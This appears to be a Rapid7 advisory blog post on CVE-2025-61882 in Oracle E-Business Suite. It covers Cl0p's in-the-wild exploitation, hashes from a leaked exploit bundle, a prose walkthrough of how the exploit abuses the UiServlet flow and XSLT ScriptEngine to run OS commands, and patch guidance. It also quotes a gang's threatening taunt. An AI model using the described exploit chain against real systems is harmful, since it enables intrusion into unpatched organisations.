Overview
On Saturday, October 4, 2025, Oracle published an advisory and accompanying patch for CVE-2025-61882. This new vulnerability affects the Oracle Concurrent Processing product within Oracle E-Business Suite (EBS), and has a CVSS score of 9.8 Critical. Per the vendor advisory, the vulnerability allows for unauthenticated remote code execution (RCE) against a target system.
Based on information published on LinkedIn by Mandiant at Google Cloud, this new vulnerability is claimed to have been exploited in-the-wild as a zero-day vulnerability by the Cl0p ransomware gang, circa August 2025. Additionally, the vendor advisory has listed several Indicators of Compromise (IOC) from observed exploitation. Included in the IOCs are several file hashes for a suspected leaked exploit script. It is currently unknown if the leaked exploit script is viable, and whether it leverages CVE-2025-61882 or an older n-day vulnerability. Rapid7 Labs is currently investigating this and we will update this blog when more information is available.
As of early Monday, October 6, 2025, several government bodies have begun to issue emergency alerts, such as the National Cyber Security Centre (NCSC) in the UK and the Cyber Security Agency (CSA) in Singapore.
The Cl0p ransomware gang is known to leverage zero-day exploits when targeting victims. In 2023, Cl0p exploited CVE-2023-34362 as a zero-day against organizations running a file transfer product called MOVEit, in a widespread ransomware campaign. Separately, and unrelated at that time, Oracle E-Business Suite was also exploited in the-wild via CVE-2022-21587, by an unknown threat actor. Given the history of both this product and the Cl0p ransomware gang, customers of affected Oracle E-Business Suite instances must take urgent action. With the leaking of suspected exploit code, broad exploitation by multiple threat actors is highly likely to begin.
Update: On October 6, 2025, CVE-2025-61882 was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), and confirmed to be used in a ransomware campaign.
The leaked exploit
In early October 2025 “SCATTERED LAPSUS$”, Shiny Hunters, or other naming variants used by the threat actor collective, publicly released a small exploit bundle and extortion campaign to a wide-running compromise of Oracle E-Business Suite customers. The exploit bundle was released on their Telegram channel:
The file contained 3 files:
- exp.py - MD5: b296d3b3115762096286f225696a9bb1
- readme.md - MD5: e278700f827590c1dff9e24116bde4da
- server.py - MD5: 23094d64721a279c0ce637584b87d6f1
The readme.md file contains instructions on how to run and setup the scripts to exploit the vulnerability.
The beginning of the file starts with the following strings:
# SCATTERED LAPSUS$ [RETARD-CL0P] HUNTERS
# SCATTERED LAPSUS$ [RETARD-CL0P] HUNTERS
CL0P you are now REPORTED to the RFJ with your FULL Dox we have ur LOCATION U WILL BE DRONE STRIKED
This is hinting towards a dox between both groups, and the “Scattered LAPSUS$” collective is calling them out for why they are extorting Oracle EBS data and to emphasize this, an example of the extortion message is being posted in the same Telegram channel:
Analyzing the scripts and code, here are some initial findings of the code:
server.py serves an XSL stylesheet whose template decodes an embedded Base64 JavaScript string and then invokes Java’s javax.script.ScriptEngine from inside the XSLT environment to eval() that string — that string constructs and calls java.lang.Runtime.getRuntime().exec(...).
In short: attacker-hosted XSL, the XSLT engine creates a ScriptEngine, the JS string is eval’d and the Java Runtime.exec runs an OS command.
exp.py abuses EBS configuration endpoints (the UiServlet / configurator flow) to get EBS to request the attacker-controlled XSL file (it constructs an encoded return_url / XML UI definition payload that points to .../ieshostedsurvey.xsl).
Once EBS fetches the XSL, the server-side XSLT evaluation performs the ScriptEngine flow described above and results in a spawned process on the EBS host.
Mitigation guidance
A vendor supplied update is available to remediate CVE-2025-61882. Customers of affected Oracle E-Business Suite instances are advised to update to the latest version of Oracle E-Business Suite on an emergency basis. The following versions are affected:
-
Oracle E-Business Suite, versions 12.2.3 through to, and including, version 12.2.14 are affected. The vulnerability is in the “Oracle Concurrent Processing” product within Oracle E-Business Suite. Notably, the vendor states that the Oracle October 2023 Critical Patch Update must first be applied before further updates.
Given that exploitation in-the-wild may have occurred since August 2025, customers of affected Oracle E-Business Suite instances that are accessible via the internet, should conduct suitable threat hunting to detect any potential malicious activity.
For the latest mitigation guidance, please refer to the vendor security advisory.
Rapid7 customers
InsightVM and Nexpose
InsightVM and Nexpose customers can assess their exposure to CVE-2025-61882 with an authenticated vulnerability check which is now available in today’s (October 6) content release.
Intelligence Hub
Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-61882.
Updates
- October 6, 2025: Added section for InsightVM and Nexpose, under Rapid7 customers.
- October 6, 2025: Updated section for InsightVM and Nexpose to confirm that authenticated vulnerability check has shipped.
- October 7, 2025: Updated Overview to add a reference to the CISA KEV list.
